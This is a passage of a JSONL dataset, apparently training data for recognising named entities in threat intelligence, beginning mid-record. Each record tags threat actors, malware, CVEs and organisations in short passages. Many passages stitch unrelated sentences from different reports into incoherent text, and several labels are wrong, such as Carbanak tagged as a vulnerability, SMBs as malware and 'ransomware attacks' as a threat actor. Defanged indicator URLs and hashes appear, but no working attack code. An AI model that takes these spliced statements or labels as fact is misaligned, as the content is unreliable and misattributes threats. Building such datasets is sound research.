"TOOL: banking Trojan": [[83, 97]], "THREAT_ACTOR: attackers": [[114, 123]], "FILEPATH: MS PowerPoint document": [[132, 154]], "VULNERABILITY: CVE-2014-6352": [[180, 193]]}, "info": {"id": "cyberner_stix_train_000947", "source": "cyberner_stix_train"}} {"text": "FrozenCell is part of a very successful , multi-platform surveillance campaign . 
This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample . We consider these domains to be “ hijacked ” because they were registered by someone for a legitimate reason , but have been leveraged by APT1 for malicious purposes . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n’t granular enough .", "spans": {"MALWARE: FrozenCell": [[0, 10]], "MALWARE: KBDLV2.DLL": [[208, 218]], "MALWARE: AUTO.DLL": [[222, 230]], "THREAT_ACTOR: APT1": [[405, 409]], "SYSTEM: Google Analytics platform": [[442, 467]], "SYSTEM: CSP rule system": [[620, 635]]}, "info": {"id": "cyberner_stix_train_000948", "source": "cyberner_stix_train"}} {"text": "The out-of-the-box server could not communicate with the client sample owing to the previously documented modifications that we had observed .", "spans": {"TOOL: out-of-the-box server": [[4, 25]]}, "info": {"id": "cyberner_stix_train_000949", "source": "cyberner_stix_train"}} {"text": "Sofacy kicked off the year deploying two 0day in a spearphish document , both a Microsoft Office encapsulated postscript type confusion exploit ( abusing CVE-2017-0262 ) and an escalation of privilege use-after-free exploit ( abusing CVE-2017-0263 ) .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "VULNERABILITY: 0day": [[41, 45]], "ORGANIZATION: Microsoft": [[80, 89]], "TOOL: Office": [[90, 96]], "VULNERABILITY: CVE-2017-0262": [[154, 167]], "VULNERABILITY: CVE-2017-0263": [[234, 247]]}, "info": {"id": "cyberner_stix_train_000950", "source": "cyberner_stix_train"}} {"text": "Before patching , the Trojan will backup the original library with a name bak_ { original name } . 
For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination . Other threat actors may also be part of this wave of attacks , though there is no confirmation at the current time . For the CrySyS Lab analysis , please read [ here ] .", "spans": {"TOOL: FrozenCell": [[131, 141]], "TOOL: Tawjihi 2016": [[168, 180]], "ORGANIZATION: students": [[214, 222]], "ORGANIZATION: CrySyS Lab": [[414, 424]]}, "info": {"id": "cyberner_stix_train_000951", "source": "cyberner_stix_train"}} {"text": "Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors .", "spans": {"ORGANIZATION: Dragos": [[29, 35]]}, "info": {"id": "cyberner_stix_train_000952", "source": "cyberner_stix_train"}} {"text": "Sofacy , also known as APT28 , Fancy Bear , and Tsar Team , is a highly active and prolific APT .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "THREAT_ACTOR: APT28": [[23, 28]], "THREAT_ACTOR: Fancy Bear": [[31, 41]], "THREAT_ACTOR: Tsar Team": [[48, 57]]}, "info": {"id": "cyberner_stix_train_000953", "source": "cyberner_stix_train"}} {"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the secondary email account .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[17, 22], [132, 137]]}, "info": {"id": "cyberner_stix_train_000954", "source": "cyberner_stix_train"}} {"text": "] 26/html2/2018/GrafKey/new-inj-135-3-dark.html hxxp : //88.99.227 [ . Despite last month 's report on aspects of the MuddyWater campaign , the group is undeterred and continues to perform operations . This is the same domain used by the KHRAT S-MAL Trojan E-MAL . 
Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"THREAT_ACTOR: group": [[144, 149]], "MALWARE: KHRAT S-MAL": [[238, 249]], "MALWARE: Trojan E-MAL": [[250, 262]]}, "info": {"id": "cyberner_stix_train_000955", "source": "cyberner_stix_train"}} {"text": "There are some indicators that this sample is just a test sample on its final stages of development . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions .", "spans": {"THREAT_ACTOR: LYCEUM": [[131, 137]], "TOOL: post-intrusion tools": [[256, 276]], "THREAT_ACTOR: APT38": [[283, 288]], "ORGANIZATION: news outlets": [[298, 310]], "ORGANIZATION: financial sector": [[340, 356]], "ORGANIZATION: financial institutions": [[438, 460]]}, "info": {"id": "cyberner_stix_train_000956", "source": "cyberner_stix_train"}} {"text": "As our investigation continued , we soon realized this was much larger than a few hacktools .", "spans": {}, "info": {"id": "cyberner_stix_train_000957", "source": "cyberner_stix_train"}} {"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . 
One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "ORGANIZATION: political activist": [[211, 229]], "ORGANIZATION: British-Iranian": [[307, 322]]}, "info": {"id": "cyberner_stix_train_000958", "source": "cyberner_stix_train"}} {"text": "We also discovered during our research that the RAT Server used by this attacker is itself vulnerable to remote attack , a double-edged sword for these attackers .", "spans": {"TOOL: RAT": [[48, 51]]}, "info": {"id": "cyberner_stix_train_000959", "source": "cyberner_stix_train"}} {"text": "These threat actors appear to be choosing the right apps – those that could be popular with locals in the region , at the right time – while tensions grow in this region of China , to ensure a good victim install-base . We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor .", "spans": {"THREAT_ACTOR: APT41": [[277, 282]], "THREAT_ACTOR: APT28": [[411, 416], [620, 625]], "ORGANIZATION: Russian government": [[598, 616]]}, "info": {"id": "cyberner_stix_train_000960", "source": "cyberner_stix_train"}} {"text": "The Trojan ’ s assets folder contained the file data.db with a list of possible values for the User-Agent field for the PAGE command ( which downloads the specified webpage ) . 
Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll ) Just last week Lazarus were found stealing millions from ATMs across Asia and Africa .", "spans": {"TOOL: Volgmer": [[177, 184]], "MALWARE: .dll": [[276, 280]], "THREAT_ACTOR: Lazarus": [[298, 305]]}, "info": {"id": "cyberner_stix_train_000961", "source": "cyberner_stix_train"}} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "ORGANIZATION: customers": [[126, 135]], "VULNERABILITY: exploit": [[166, 173], [356, 363]], "MALWARE: InPage software": [[178, 193]], "ORGANIZATION: Unit42": [[248, 254]], "TOOL: InPage": [[277, 283]], "VULNERABILITY: exploits": [[284, 292]], "ORGANIZATION: Kaspersky": [[388, 397]]}, "info": {"id": "cyberner_stix_train_000962", "source": "cyberner_stix_train"}} {"text": "We therefore believe the Dukes ’ primary mission to be so valuable to their benefactors that its continuation outweighs everything else .", "spans": {"THREAT_ACTOR: Dukes": [[25, 30]]}, "info": {"id": "cyberner_stix_train_000963", "source": "cyberner_stix_train"}} {"text": "Downeks also has a self-update capability , if instructed by the C2 .", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: C2": [[65, 67]]}, "info": {"id": "cyberner_stix_train_000964", "source": "cyberner_stix_train"}} {"text": "However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused . 
Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: Dragos": [[154, 160]], "THREAT_ACTOR: XENOTIME": [[237, 245]]}, "info": {"id": "cyberner_stix_train_000965", "source": "cyberner_stix_train"}} {"text": "MenuPass is a well-documented CN-APT group , whose roots go back to 2009 . iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 .", "spans": {"THREAT_ACTOR: MenuPass": [[0, 8]], "ORGANIZATION: iSiGHT Partners": [[75, 90]], "THREAT_ACTOR: Sandworm Team": [[103, 116]], "VULNERABILITY: zero-day": [[238, 246]], "VULNERABILITY: exploit": [[247, 254]], "VULNERABILITY: CVE-2014-4114": [[257, 270]]}, "info": {"id": "cyberner_stix_train_000966", "source": "cyberner_stix_train"}} {"text": "campaigns involving both BokBot and TrickBot were first identified by CrowdStrike Intelligence in July 2017 . Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector .", "spans": {"TOOL: BokBot": [[25, 31]], "TOOL: TrickBot": [[36, 44]], "ORGANIZATION: CrowdStrike Intelligence": [[70, 94]], "ORGANIZATION: Group-IB": [[110, 118]], "ORGANIZATION: financial sector": [[227, 243]]}, "info": {"id": "cyberner_stix_train_000967", "source": "cyberner_stix_train"}} {"text": "For example , if an infected device is connected to a public Wi-Fi network any other host will be able to obtain a terminal on the device without any form of authentication or verification by simply connecting to the port . Most of the group 's attacks are focused on government or technology related companies and organizations . 
Asala.mp3 : The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": {"ORGANIZATION: government": [[268, 278]], "ORGANIZATION: technology related companies": [[282, 310]], "FILEPATH: Asala.mp3": [[331, 340]], "ORGANIZATION: Talos": [[363, 368]], "TOOL: Open Babel": [[399, 409]]}, "info": {"id": "cyberner_stix_train_000968", "source": "cyberner_stix_train"}} {"text": "Here are some highlights . Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network . TransFile Transfer file in or from remote host . Software developers can use coded certificates to digitally sign their software , which means any code with that signature becomes a trusted source .", "spans": {"THREAT_ACTOR: APT40": [[67, 72]], "TOOL: Gh0st RAT trojan": [[183, 199]], "ORGANIZATION: Software developers": [[300, 319]]}, "info": {"id": "cyberner_stix_train_000969", "source": "cyberner_stix_train"}} {"text": "Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3 Custom activity prefix com.cact.CAct Cerberus - A new banking Trojan from the underworld August 2019 In June 2019 , ThreatFabric analysts found a new Android malware , dubbed “ Cerberus ” , being rented out on underground forums . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . 
We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy .", "spans": {"MALWARE: Cerberus": [[115, 123], [255, 263]], "ORGANIZATION: ThreatFabric": [[194, 206]], "SYSTEM: Android": [[228, 235]], "THREAT_ACTOR: Machete's": [[309, 318]], "THREAT_ACTOR: APT38": [[475, 480]], "THREAT_ACTOR: operators": [[513, 522]]}, "info": {"id": "cyberner_stix_train_000970", "source": "cyberner_stix_train"}} {"text": "The C & C server observed in this campaign is ‘ www [ . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction .", "spans": {"VULNERABILITY: Carbanak": [[131, 139]], "THREAT_ACTOR: cyber-criminal gang": [[144, 163]], "ORGANIZATION: financial institutions": [[265, 287]], "ORGANIZATION: commercial organizations": [[385, 409]], "ORGANIZATION: government organizations": [[436, 460]]}, "info": {"id": "cyberner_stix_train_000971", "source": "cyberner_stix_train"}} {"text": "iSiGHT has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . 
PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": {"ORGANIZATION: iSiGHT": [[0, 6]], "THREAT_ACTOR: Sandworm Team": [[19, 32]], "VULNERABILITY: zero-day exploit": [[154, 170]], "VULNERABILITY: CVE-2014-4114": [[173, 186]], "THREAT_ACTOR: PLATINUM": [[189, 197]], "ORGANIZATION: specific individuals": [[271, 291]], "VULNERABILITY: zero-day": [[332, 340]]}, "info": {"id": "cyberner_stix_train_000972", "source": "cyberner_stix_train"}} {"text": "Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors .", "spans": {"VULNERABILITY: Flash Player exploit": [[35, 55]], "VULNERABILITY: CVE-2016-4117": [[58, 71]]}, "info": {"id": "cyberner_stix_train_000973", "source": "cyberner_stix_train"}} {"text": "By using the login and password stolen from the browser , the Windows Trojan initiates a fake transaction while Perkele intercepts ( via the C & C server ) the mTAN sent by the bank to the user . It is not the first time Turla has used generic tools . SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c . 
Harrison even went after Bradshaw ’s lawyer and wife , listing them both on a website he created called Contact - a - CEO[.]com , which Harrison used to besmirch the name of major companies — including several past employers — all entities he believed had slighted him or his family in some way .", "spans": {"MALWARE: Perkele": [[112, 119]], "THREAT_ACTOR: Turla": [[221, 226]], "TOOL: generic tools": [[236, 249]], "FILEPATH: 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c": [[261, 325]], "THREAT_ACTOR: Harrison": [[328, 336]], "ORGANIZATION: Bradshaw ’s lawyer and wife": [[353, 380]]}, "info": {"id": "cyberner_stix_train_000974", "source": "cyberner_stix_train"}} {"text": "There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": {"THREAT_ACTOR: Gallmaker": [[106, 115]], "ORGANIZATION: defense": [[146, 153]], "ORGANIZATION: military": [[156, 164]], "ORGANIZATION: government sectors": [[171, 189]], "ORGANIZATION: civil society": [[261, 274]], "ORGANIZATION: human rights organizations": [[279, 305]], "ORGANIZATION: diaspora": [[435, 443]]}, "info": {"id": "cyberner_stix_train_000975", "source": "cyberner_stix_train"}} {"text": "With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . 
This algorithm was previously discussed by security researchers in a Confucius-related blog post .", "spans": {"MALWARE: SWAnalytics": [[24, 35]]}, "info": {"id": "cyberner_stix_train_000976", "source": "cyberner_stix_train"}} {"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China .", "spans": {"THREAT_ACTOR: APT32": [[10, 15]], "MALWARE: Vietnam.exe": [[114, 125]]}, "info": {"id": "cyberner_stix_train_000977", "source": "cyberner_stix_train"}} {"text": "Example of traffic from an early version of Asacub ( 2015 ) The data transmitted and received is encrypted with the RC4 algorithm and encoded using the base64 standard . Through an IP address whitelisting process , the threat group selectively targets visitors to these websites . Files using simple PHP-based web shells were also used to attack systems with weak SSH and Telnet credentials . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": {"MALWARE: Asacub": [[44, 50]], "ORGANIZATION: CrowdStrike researchers": [[393, 416]], "ORGANIZATION: Exchange systems": [[457, 473]]}, "info": {"id": "cyberner_stix_train_000978", "source": "cyberner_stix_train"}} {"text": "However , Earworm also appears to conduct separate operations from APT28 and thus Symantec tracks them as a distinct group .", "spans": {"THREAT_ACTOR: Earworm": [[10, 17]], "THREAT_ACTOR: APT28": [[67, 72]], "ORGANIZATION: Symantec": [[82, 90]]}, "info": {"id": "cyberner_stix_train_000979", "source": "cyberner_stix_train"}} {"text": "Over the year , the number of mobile malware modifications designed for phishing , the theft of credit card information and money increased by a factor of 19.7 . 
Emissary Panda is still active and continues to target selected organisations . This campaign of the Winnti Group against Hong Kong universities was taking place in the context of Hong Kong facing civic protests that started in June 2019 triggered by an extradition bill . For example , the report shows that the US shouldered a hefty 43 percent of all global attacks and that ransomware attacks in France nearly doubled in the last five months .", "spans": {"THREAT_ACTOR: Winnti Group": [[263, 275]], "THREAT_ACTOR: ransomware attacks": [[539, 557]]}, "info": {"id": "cyberner_stix_train_000980", "source": "cyberner_stix_train"}} {"text": "TG-3390 actors use command and control ( C2 ) domains for extended periods of time but frequently change the domains' IP addresses .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: command and control": [[19, 38]], "TOOL: C2": [[41, 43]]}, "info": {"id": "cyberner_stix_train_000981", "source": "cyberner_stix_train"}} {"text": "iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . There were traces of HyperBro in the infected data center from mid-November 2017 .", "spans": {"ORGANIZATION: iSiGHT Partners": [[0, 15]], "THREAT_ACTOR: Sandworm Team": [[28, 41]], "VULNERABILITY: zero-day exploit": [[163, 179]], "VULNERABILITY: CVE-2014-4114": [[182, 195]], "MALWARE: HyperBro": [[219, 227]]}, "info": {"id": "cyberner_stix_train_000982", "source": "cyberner_stix_train"}} {"text": "All of the most recent versions of EventBot contain a ChaCha20 library that can improve performance when compared to other algorithms like RC4 and AES . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . 
We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country .", "spans": {"MALWARE: EventBot": [[35, 43]], "SYSTEM: ChaCha20": [[54, 62]], "MALWARE: Okrum": [[182, 187]], "THREAT_ACTOR: APT32": [[427, 432]]}, "info": {"id": "cyberner_stix_train_000983", "source": "cyberner_stix_train"}} {"text": "Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": {"ORGANIZATION: bank": [[105, 109]], "MALWARE: SMBs": [[225, 229]], "ORGANIZATION: accountants": [[267, 278]]}, "info": {"id": "cyberner_stix_train_000984", "source": "cyberner_stix_train"}} {"text": "The GandCrab author also had a spat with South Korean security vendor AhnLab last summer after the security firm released a vaccine for the GandCrab ransomware . In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message .", "spans": {"TOOL: GandCrab": [[4, 12]], "ORGANIZATION: AhnLab": [[70, 76]], "ORGANIZATION: security firm": [[99, 112]], "TOOL: GandCrab ransomware": [[140, 159]], "THREAT_ACTOR: Sima": [[180, 184]]}, "info": {"id": "cyberner_stix_train_000985", "source": "cyberner_stix_train"}} {"text": "And others have all malicious content removed , except for log comments referencing the payment process . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world . I have the same machine infected with two different version of ZxShell . 
As opposed to the PowerPoint documents that did not display any slides in our testing environments , all Excel documents display legitimate - looking documents related to the targeted military organizations , or generic descriptions on how to enable VBA macro functionality in Excel .", "spans": {"THREAT_ACTOR: Barium": [[106, 112]], "ORGANIZATION: Microsoft customers": [[126, 145]], "MALWARE: ZxShell": [[271, 278]], "TOOL: VBA macro": [[531, 540]]}, "info": {"id": "cyberner_stix_train_000986", "source": "cyberner_stix_train"}} {"text": "We found nine additional samples sharing the imphash values for the two executables , C66F88D2D76D79210D568D7AD7896B45 and DCF3AA484253068D8833C7C5B019B07 .", "spans": {"FILEPATH: C66F88D2D76D79210D568D7AD7896B45": [[86, 118]], "FILEPATH: DCF3AA484253068D8833C7C5B019B07": [[123, 154]]}, "info": {"id": "cyberner_stix_train_000987", "source": "cyberner_stix_train"}} {"text": "The C2 address , as stored in samples we ’ ve seen , comprise both an IP address and port number ; So far , all the samples we ’ ve tested attempted to contact an IP address on port 7878/tcp . Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship . Instead , If you followed Cybersecurity and Infrastructure Security Agency CISA alerts on ransomware for the year , you would have noted malicious activity attributed to many ransomware variants .", "spans": {"THREAT_ACTOR: operational groups": [[368, 386]], "ORGANIZATION: Cybersecurity and Infrastructure Security Agency CISA": [[518, 571]], "MALWARE: ransomware variants": [[667, 686]]}, "info": {"id": "cyberner_stix_train_000988", "source": "cyberner_stix_train"}} {"text": "In March , it peaked at 1,169 infections . 
We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot . The malware author has a curious sense of humor . Ways our customers can detect and block this threat are listed below .", "spans": {"TOOL: ThreeDollars": [[80, 92]], "MALWARE: preparation.dot": [[152, 167]]}, "info": {"id": "cyberner_stix_train_000989", "source": "cyberner_stix_train"}} {"text": "Shellcode downloads and runs executable payload .", "spans": {"TOOL: Shellcode": [[0, 9]]}, "info": {"id": "cyberner_stix_train_000990", "source": "cyberner_stix_train"}} {"text": "At the same time , it hides an icon and starts background services to hide further actions from the user . Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets , and lacks advanced offensive technology development capabilities . The White Company is a likely state-sponsored threat actor with advanced capabilities .", "spans": {"THREAT_ACTOR: NewsBeef": [[132, 140]], "THREAT_ACTOR: The White Company": [[289, 306]]}, "info": {"id": "cyberner_stix_train_000991", "source": "cyberner_stix_train"}} {"text": "] com/ hxxp : //apple-icloud [ . After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests . When there are no more bytes to send, a hardcoded file end marker COCTabCOCT is sent in the data section and the send loop will be . 
Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": {"THREAT_ACTOR: APT28": [[76, 81]]}, "info": {"id": "cyberner_stix_train_000992", "source": "cyberner_stix_train"}} {"text": "The additional commands that attackers can carry out via a socket connection ( top ) and the key used to encrypt the stolen data ( bottom ) Correlating Bouncing Golf 's Activities We monitored Bouncing Golf ’ s C & C-related activities and saw that the campaign has affected more than 660 devices as of this writing . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . Even though we have been able to retrieve four different modules , it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation . It contains features such as having the victim ’s email address pre - filled and displaying their appropriate company logo and background image , extracted from the target organization ’s real Microsoft 365 login page .", "spans": {"MALWARE: Bouncing Golf": [[152, 165], [193, 206]], "VULNERABILITY: CVE-2016-4117": [[386, 399]], "THREAT_ACTOR: FIN7": [[522, 526]]}, "info": {"id": "cyberner_stix_train_000993", "source": "cyberner_stix_train"}} {"text": "This DealersChoice Flash object shares a similar process to previous variants ; however , it appears that the Sofacy actors have made slight changes to its internal code .", "spans": {"TOOL: DealersChoice": [[5, 18]], "TOOL: Flash": [[19, 24]], "THREAT_ACTOR: Sofacy": [[110, 116]]}, "info": {"id": "cyberner_stix_train_000994", "source": "cyberner_stix_train"}} {"text": "Intelligence collection directed by nation state actors against US political targets provides invaluable insight into the requirements directed upon those actors .", "spans": {}, "info": {"id": "cyberner_stix_train_000995", "source": 
"cyberner_stix_train"}} {"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: Trojan": [[308, 314]], "MALWARE: Lurk": [[322, 326]]}, "info": {"id": "cyberner_stix_train_000996", "source": "cyberner_stix_train"}} {"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"MALWARE: GoogleUpdate.exe": [[4, 20]], "ORGANIZATION: Trend Micro": [[107, 118]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[152, 171]]}, "info": {"id": "cyberner_stix_train_000997", "source": "cyberner_stix_train"}} {"text": "The nine stolen certificates originated from nine different companies who are physically located close together around the central districts of Seoul , South Korea .", "spans": {}, "info": {"id": "cyberner_stix_train_000998", "source": "cyberner_stix_train"}} {"text": "TG-3390 uses the PlugX remote access tool .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "MALWARE: PlugX": [[17, 22]]}, "info": {"id": "cyberner_stix_train_000999", "source": "cyberner_stix_train"}} {"text": "Also , in some versions of the Trojan the file names were random strings of characters . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . 
Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 .", "spans": {"TOOL: DropIt sample": [[117, 130]], "MALWARE: %TEMP%\\flash_update.exe": [[268, 291]], "TOOL: Flash Player installer": [[316, 338]], "MALWARE: WannaCry": [[413, 421]]}, "info": {"id": "cyberner_stix_train_001000", "source": "cyberner_stix_train"}} {"text": "The C & C server IP addresses used also appear to be disparate , as they were located in many European countries like Russia , France , Holland , and Germany . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . A few days after the tweet , in January 2019 , the operators changed their landing page in order to prevent this type of tracking against their infrastructure . Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service , potentially allowing anyone with a moderate amount of technical ability to carry out advanced , convincing phishing attacks .", "spans": {"ORGANIZATION: Kaspersky": [[160, 169]], "THREAT_ACTOR: ScarCruft": [[186, 195]], "VULNERABILITY: zero-day": [[225, 233]], "VULNERABILITY: CVE-2016-0147": [[236, 249]], "THREAT_ACTOR: advanced , convincing phishing attacks": [[719, 757]]}, "info": {"id": "cyberner_stix_train_001001", "source": "cyberner_stix_train"}} {"text": "Known CozyDuke modules include : Command execution module for executing arbitrary Windows Command Prompt commands , Password stealer module , NT LAN Manager ( NTLM ) hash stealer module , System information gathering module , Screenshot module .", "spans": {"MALWARE: CozyDuke": [[6, 14]], "SYSTEM: Windows": [[82, 89]], "TOOL: Command Prompt": [[90, 104]], "TOOL: Password stealer": [[116, 132]], "TOOL: NT LAN Manager": [[142, 
156]], "TOOL: NTLM": [[159, 163]], "TOOL: hash stealer": [[166, 178]]}, "info": {"id": "cyberner_stix_train_001002", "source": "cyberner_stix_train"}} {"text": "This sort of functionality is more common in criminality-oriented botnets , not statesponsored targeted attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_001003", "source": "cyberner_stix_train"}} {"text": "We first started tracking Bread ( also known as Joker ) in early 2017 , identifying apps designed solely for SMS fraud . A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology . The command processing function starts by substituting the main module name and path in the hosting process PEB , with the one of the default internet browser . The attacks that Anonymous Sudan has claimed in support of KillNet , both before and after it officially joined the collective , have broadened the geographic scope of its targeting to include entities elsewhere in Europe and the U.S. ; it has since continued to expand the scope of its targeting further afield to include countries such as Israel and Ethiopia .", "spans": {"MALWARE: Bread": [[26, 31]], "MALWARE: Joker": [[48, 53]], "ORGANIZATION: maritime sector": [[199, 214]]}, "info": {"id": "cyberner_stix_train_001004", "source": "cyberner_stix_train"}} {"text": "The WIZARD SPIDER threat group , known as the Russia-based operator of the TrickBot banking malware , had focused primarily on wire fraud in the past . 
This week we will discuss another Chinese nexus adversary we call Samurai Panda .", "spans": {"THREAT_ACTOR: WIZARD SPIDER threat group": [[4, 30]], "TOOL: TrickBot banking malware": [[75, 99]]}, "info": {"id": "cyberner_stix_train_001005", "source": "cyberner_stix_train"}} {"text": "The code for downloading and executing the next stage malware .", "spans": {}, "info": {"id": "cyberner_stix_train_001006", "source": "cyberner_stix_train"}} {"text": "Allows applications to change network connectivity state . The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016 .", "spans": {"THREAT_ACTOR: CIA": [[63, 66]], "THREAT_ACTOR: DarkHydrus": [[168, 178]]}, "info": {"id": "cyberner_stix_train_001007", "source": "cyberner_stix_train"}} {"text": "TL ; DR Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users Bread apps originally performed SMS fraud , but have largely abandoned this for WAP billing following the introduction of new Play policies restricting use of the SEND_SMS permission and increased coverage by Google Play Protect More information on stats and relative impact is available in the Android Security 2018 Year in Review report BILLING FRAUD Bread apps typically fall into two categories : SMS fraud ( older versions ) and toll fraud ( newer versions ) . Dragos does not corroborate nor conduct political attribution to threat activity . The command processing is straightforward . 
